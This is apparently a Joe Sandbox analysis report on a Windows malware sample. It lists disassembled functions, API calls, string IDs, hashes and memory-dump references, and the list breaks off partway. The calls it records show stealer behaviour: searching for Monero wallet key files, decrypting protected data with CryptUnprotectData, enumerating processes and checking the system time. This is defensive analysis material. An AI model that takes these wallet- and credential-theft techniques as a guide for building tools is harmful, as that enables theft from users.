                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ?Gk$LxV$^mw$dql.$e3wo$kig{$lLk
                        • API String ID: 0-2097328590
                        • Opcode ID: 9bcccd62618babde5730013037370a47a56883c95a9f43c5ae9475b2c2b7c382
                        • Instruction ID: f965bc6b5ae74094bbacbb706540fb6259bcdf4bf58269dfb97cb262324d98b3
                        • Opcode Fuzzy Hash: 9bcccd62618babde5730013037370a47a56883c95a9f43c5ae9475b2c2b7c382
                        • Instruction Fuzzy Hash: 6FB22BF3A0C2049FE3046E2DEC8567ABBD6EFD4720F1A863DEAC497744E93558018796
                        Function 0026E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00280D73), ref: 0026E4A2
                        • StrCmpCA.SHLWAPI(?,002814F8), ref: 0026E4F2
                        • StrCmpCA.SHLWAPI(?,002814FC), ref: 0026E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 89c80c29dffe72f4aa3f39e201fcd3949a53d9e4d644f5e5156da9c96e4d29e9
                        • Instruction ID: cd088ee64af9ae22236f586e450dd614ab93b21589b8982ed46b702120222ab2
                        • Opcode Fuzzy Hash: 89c80c29dffe72f4aa3f39e201fcd3949a53d9e4d644f5e5156da9c96e4d29e9
                        • Instruction Fuzzy Hash: 8C1231719201189ADB18FB70DC96EEE7338AF94310F4085A9B51F96091EF346F69CF92
                        Function 00632319 Relevance: 9.1, Strings: 6, Instructions: 1640COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "qn$;'o~$Q>r$h:w$.c$k~
                        • API String ID: 0-750262017
                        • Opcode ID: c4b06f9bb42daa874629433d333d2123d59f7a547a5ca3007e9e89fac07e2ff4
                        • Instruction ID: 828a985a6050017eaee19439b945895bb18ee58ed6efcbb789c2c159ee519256
                        • Opcode Fuzzy Hash: c4b06f9bb42daa874629433d333d2123d59f7a547a5ca3007e9e89fac07e2ff4
                        • Instruction Fuzzy Hash: 23B2E3F360C2049FE304AE2DEC8567AFBE9EF94620F16893DE6C5C3744EA3558058697
                        Function 00269AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                        • LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N&
                        • API String ID: 4291131564-1489400810
                        • Opcode ID: cf7ebd9a746426515f1a30b4c32422d0b9e3cf43c5d94023d5a9e1acaffe173e
                        • Instruction ID: f3391202e557979ca41832704313ce5d0267bb56df17860d1a8fef95a37c48fc
                        • Opcode Fuzzy Hash: cf7ebd9a746426515f1a30b4c32422d0b9e3cf43c5d94023d5a9e1acaffe173e
                        • Instruction Fuzzy Hash: 2211D4B4240208AFEB00CF64CC95FAA77B9FB8AB14F208058F9159F390C775A951CB54
                        Function 00629CD6 Relevance: 7.8, Strings: 5, Instructions: 1528COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7Is{$G>$TNkV$lN$wN?
                        • API String ID: 0-2232020119
                        • Opcode ID: a68daa9b8a01490c3f9601220341e7a15b7c5de5c7c32472e6b00f94845903a9
                        • Instruction ID: c2351524f396135d8b889b97d269e0d5d781591b9c52d65a65e9d3a0aa9c4f79
                        • Opcode Fuzzy Hash: a68daa9b8a01490c3f9601220341e7a15b7c5de5c7c32472e6b00f94845903a9
                        • Instruction Fuzzy Hash: F8A205F39086049FE704AE29EC8567AFBE5EF94320F164A3DEAC5C7344E63598058787
                        Function 0026C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0026C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0026C87C
                        • lstrcat.KERNEL32(?,00280B46), ref: 0026C943
                        • lstrcat.KERNEL32(?,00280B47), ref: 0026C957
                        • lstrcat.KERNEL32(?,00280B4E), ref: 0026C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 5e6f8ec5916ebf0bd3b0457bbe7425f2ce41f2d52958a010abf35a95d6d58728
                        • Instruction ID: 39deb8d54d365eae0d2babc1cb7152d77bb069345a912bb849561e760a354f3c
                        • Opcode Fuzzy Hash: 5e6f8ec5916ebf0bd3b0457bbe7425f2ce41f2d52958a010abf35a95d6d58728
                        • Instruction Fuzzy Hash: F64171B591421ADBDB10EFA0DD89BFEBBB8BB48304F1041B8E509A7280D7745A94CF91
                        Function 00276920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0027696C
                        • sscanf.NTDLL ref: 00276999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002769B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002769C0
                        • ExitProcess.KERNEL32 ref: 002769DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: d8aed5c24500c722b771646e31faa92f4c59303ff3696dbb0924e949169daf33
                        • Instruction ID: 13feed48b48b6eebcbc8cbcbef3796362ae3d058d06b9f34fdc5cd47f9abb24f
                        • Opcode Fuzzy Hash: d8aed5c24500c722b771646e31faa92f4c59303ff3696dbb0924e949169daf33
                        • Instruction Fuzzy Hash: 4621FF75D10209ABCF44EFE4D9499EEBBB5FF48300F04852EE51AE3250EB345618CB69
                        Function 00267240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0026724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00267254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00267281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002672A4
                        • LocalFree.KERNEL32(?), ref: 002672AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: cb81376887b05c9ac7ceea823e7a0715fe9a5b525c78f60ddceac076bef3b72e
                        • Instruction ID: ea05f43485e0876719304ff0373034879cebf726beb27f6b002a2c1ba00e2ee6
                        • Opcode Fuzzy Hash: cb81376887b05c9ac7ceea823e7a0715fe9a5b525c78f60ddceac076bef3b72e
                        • Instruction Fuzzy Hash: 220112B5A50208BBEB10DFD4DD49F9E7B78EB44B04F104558FB05AB2C0D7B4AA10CB69
                        Function 00279600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0027961E
                        • Process32First.KERNEL32(00280ACA,00000128), ref: 00279632
                        • Process32Next.KERNEL32(00280ACA,00000128), ref: 00279647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0027965C
                        • CloseHandle.KERNEL32(00280ACA), ref: 0027967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 3b36fbbd21db13875b906ceb63ce224a5e5ea85ed2cd31b7994d37fe604a7581
                        • Instruction ID: e5910ad5c6d6054e02cbc5fe12badfeba248fee9749eec894d6110cb3d5909bb
                        • Opcode Fuzzy Hash: 3b36fbbd21db13875b906ceb63ce224a5e5ea85ed2cd31b7994d37fe604a7581
                        • Instruction Fuzzy Hash: D8011E75A10309EBDB15DFA5CD48BEEBBF8EF48300F108298A90A97240D7759BA4CF51
                        Function 006219AB Relevance: 7.5, Strings: 5, Instructions: 1261COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: s$00Fm$Aco~$GFJ$*}R
                        • API String ID: 0-1737098953
                        • Opcode ID: 91f6771a3e86d83f1ee4ff6efaad9d0cad6511acf2c9eed8d27db7e8a3adb468
                        • Instruction ID: cceff722333a28a67cf60fdca13e2c369d4e81f1342ae5ff52979464f0486b49
                        • Opcode Fuzzy Hash: 91f6771a3e86d83f1ee4ff6efaad9d0cad6511acf2c9eed8d27db7e8a3adb468
                        • Instruction Fuzzy Hash: 6A82F7B3A0C2049FD704AE2DEC8567AF7E5EF94720F1A893DE6C4C3744EA3558058697
                        Function 0061FAD5 Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n[L$?4W~$?ww$y?9G
                        • API String ID: 0-3159914443
                        • Opcode ID: 7382f1d7f397adc32af04287568f639d84181c9e1a7037fdb9cfed2aa62af338
                        • Instruction ID: 3ce9a2abb83b5cc59306aa42e65913a31578d3185b0b96423b31f156a056e8d2
                        • Opcode Fuzzy Hash: 7382f1d7f397adc32af04287568f639d84181c9e1a7037fdb9cfed2aa62af338
                        • Instruction Fuzzy Hash: 63B217F3A082049FE3046E2DEC8567AFBE9EF94720F1A453DE6C4C7744E63598058697
                        Function 00278EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00265184,40000001,00000000,00000000,?,00265184), ref: 00278EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
